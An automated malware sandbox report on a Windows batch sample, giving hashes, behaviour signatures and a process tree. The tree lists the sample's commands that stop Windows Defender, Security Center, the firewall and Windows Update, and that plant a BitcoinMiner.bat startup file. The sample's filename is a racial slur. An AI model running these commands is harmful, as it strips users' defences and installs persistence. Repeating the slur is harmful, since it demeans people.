Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-09-2024 06:18
Static task
static1
Behavioral task
behavioral1
Sample
nigger.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
nigger.bat
Resource
win10v2004-20240802-en
General
-
Target
nigger.bat
-
Size
22KB
-
MD5
9728d8cbe0f70e03fd89949af0e83ec9
-
SHA1
29156b3c59987aea93a444a7bc3e910d58cce381
-
SHA256
a0a59c0434f9f36915f4b00704f1270878412dd6f63639956616faed8d3417be
-
SHA512
6637bf029dfdeb38d225db1b60e28d2d351f70e609e6049274a88d95cb4c2f6067c855c63fc5faeff20610025327d4b3c840379be43df05c1de888d2b9696137
-
SSDEEP
192:P9+NMQsAG26lW9AU4c8gbDkMtzHkb4+6OFJIkRpGV9+NMQsAG26lW9AU4c8gbDkm:P9+mlk9+mlw
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2120 netsh.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat xcopy.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat xcopy.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Kills process with taskkill 1 IoCs
pid Process 2504 taskkill.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2504 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1972 wrote to memory of 2524 1972 cmd.exe 31 PID 1972 wrote to memory of 2524 1972 cmd.exe 31 PID 1972 wrote to memory of 2524 1972 cmd.exe 31 PID 2524 wrote to memory of 2984 2524 net.exe 32 PID 2524 wrote to memory of 2984 2524 net.exe 32 PID 2524 wrote to memory of 2984 2524 net.exe 32 PID 1972 wrote to memory of 3036 1972 cmd.exe 33 PID 1972 wrote to memory of 3036 1972 cmd.exe 33 PID 1972 wrote to memory of 3036 1972 cmd.exe 33 PID 3036 wrote to memory of 2292 3036 net.exe 34 PID 3036 wrote to memory of 2292 3036 net.exe 34 PID 3036 wrote to memory of 2292 3036 net.exe 34 PID 1972 wrote to memory of 1992 1972 cmd.exe 35 PID 1972 wrote to memory of 1992 1972 cmd.exe 35 PID 1972 wrote to memory of 1992 1972 cmd.exe 35 PID 1992 wrote to memory of 2032 1992 net.exe 36 PID 1992 wrote to memory of 2032 1992 net.exe 36 PID 1992 wrote to memory of 2032 1992 net.exe 36 PID 1972 wrote to memory of 2504 1972 cmd.exe 37 PID 1972 wrote to memory of 2504 1972 cmd.exe 37 PID 1972 wrote to memory of 2504 1972 cmd.exe 37 PID 1972 wrote to memory of 2288 1972 cmd.exe 39 PID 1972 wrote to memory of 2288 1972 cmd.exe 39 PID 1972 wrote to memory of 2288 1972 cmd.exe 39 PID 2288 wrote to memory of 2280 2288 net.exe 40 PID 2288 wrote to memory of 2280 2288 net.exe 40 PID 2288 wrote to memory of 2280 2288 net.exe 40 PID 1972 wrote to memory of 2960 1972 cmd.exe 41 PID 1972 wrote to memory of 2960 1972 cmd.exe 41 PID 1972 wrote to memory of 2960 1972 cmd.exe 41 PID 2960 wrote to memory of 2224 2960 net.exe 42 PID 2960 wrote to memory of 2224 2960 net.exe 42 PID 2960 wrote to memory of 2224 2960 net.exe 42 PID 1972 wrote to memory of 2120 1972 cmd.exe 43 PID 1972 wrote to memory of 2120 1972 cmd.exe 43 PID 1972 wrote to memory of 2120 1972 cmd.exe 43 PID 1972 wrote to memory of 2116 1972 cmd.exe 44 PID 1972 wrote to memory of 2116 1972 cmd.exe 44 PID 1972 wrote to memory of 2116 1972 cmd.exe 44 PID 2116 wrote to memory of 1644 2116 net.exe 45 PID 2116 wrote to memory of 1644 2116 net.exe 45 PID 2116 wrote to memory of 1644 2116 net.exe 45 PID 1972 wrote to memory of 2856 1972 cmd.exe 46 PID 1972 wrote to memory of 2856 1972 cmd.exe 46 PID 1972 wrote to memory of 2856 1972 cmd.exe 46 PID 1972 wrote to memory of 2764 1972 cmd.exe 47 PID 1972 wrote to memory of 2764 1972 cmd.exe 47 PID 1972 wrote to memory of 2764 1972 cmd.exe 47 PID 1972 wrote to memory of 2400 1972 cmd.exe 48 PID 1972 wrote to memory of 2400 1972 cmd.exe 48 PID 1972 wrote to memory of 2400 1972 cmd.exe 48 PID 1972 wrote to memory of 2892 1972 cmd.exe 49 PID 1972 wrote to memory of 2892 1972 cmd.exe 49 PID 1972 wrote to memory of 2892 1972 cmd.exe 49 PID 1972 wrote to memory of 3048 1972 cmd.exe 51 PID 1972 wrote to memory of 3048 1972 cmd.exe 51 PID 1972 wrote to memory of 3048 1972 cmd.exe 51 PID 1972 wrote to memory of 2276 1972 cmd.exe 52 PID 1972 wrote to memory of 2276 1972 cmd.exe 52 PID 1972 wrote to memory of 2276 1972 cmd.exe 52 PID 1972 wrote to memory of 676 1972 cmd.exe 53 PID 1972 wrote to memory of 676 1972 cmd.exe 53 PID 1972 wrote to memory of 676 1972 cmd.exe 53 PID 1972 wrote to memory of 2476 1972 cmd.exe 54
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\nigger.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2984
-
-
-
C:\Windows\system32\net.exenet stop "SDRSVC"2⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC"3⤵PID:2292
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵PID:2032
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵PID:2280
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵PID:2224
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2120
-
-
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵PID:1644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo tasklist "2⤵PID:2856
-
-
C:\Windows\system32\find.exefind /I "L0Lz"2⤵PID:2764
-
-
C:\Windows\system32\xcopy.exeXCOPY "BitcoinMiner.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"2⤵
- Drops startup file
PID:2400
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:2892
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:3048
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:2276
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:676
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:2476
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:2556
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:1704
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:1856
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:592
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:776
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:1348
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:1732
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:2184
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:1460
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:1660
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:1764
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:372
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:2836
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:2260
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:2664
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:2408
-
-
C:\Windows\system32\xcopy.exeXCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"2⤵PID:3044
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
271B
MD5e975f5739aa276ac84d20381d5864424
SHA1e908dbd044364a9c0289c93ca9b360e5596ff310
SHA256609a4f1965c69e4aa87b462c65f306614b403b43e145a4804833a8f9fd9d011b
SHA5127aea28f814ebc509061c45334ee06246499219f0f4de8f960cb4b030d93de9ebfee8067630e9355065f422e8fb4c275ea499337073fa513f8d092e96f51d2dcf
-
Filesize
271B
MD5f006e7d4dccfb3da2975fa59fc8f8079
SHA1be32b0764c841c09e3d4931476dde18cf9776b52
SHA256fb5a84b8d151d7705990e0b26b0a2f326c587126f56a9b33068a534836bdd682
SHA512c38584c2ee3c0c7fbf1fa177e86751f8240f6295a7f211e890361991b2c485f293c3a736981effc824643bbca802ae1f0caf45adb3bb5a9b2321d433fb08bfd2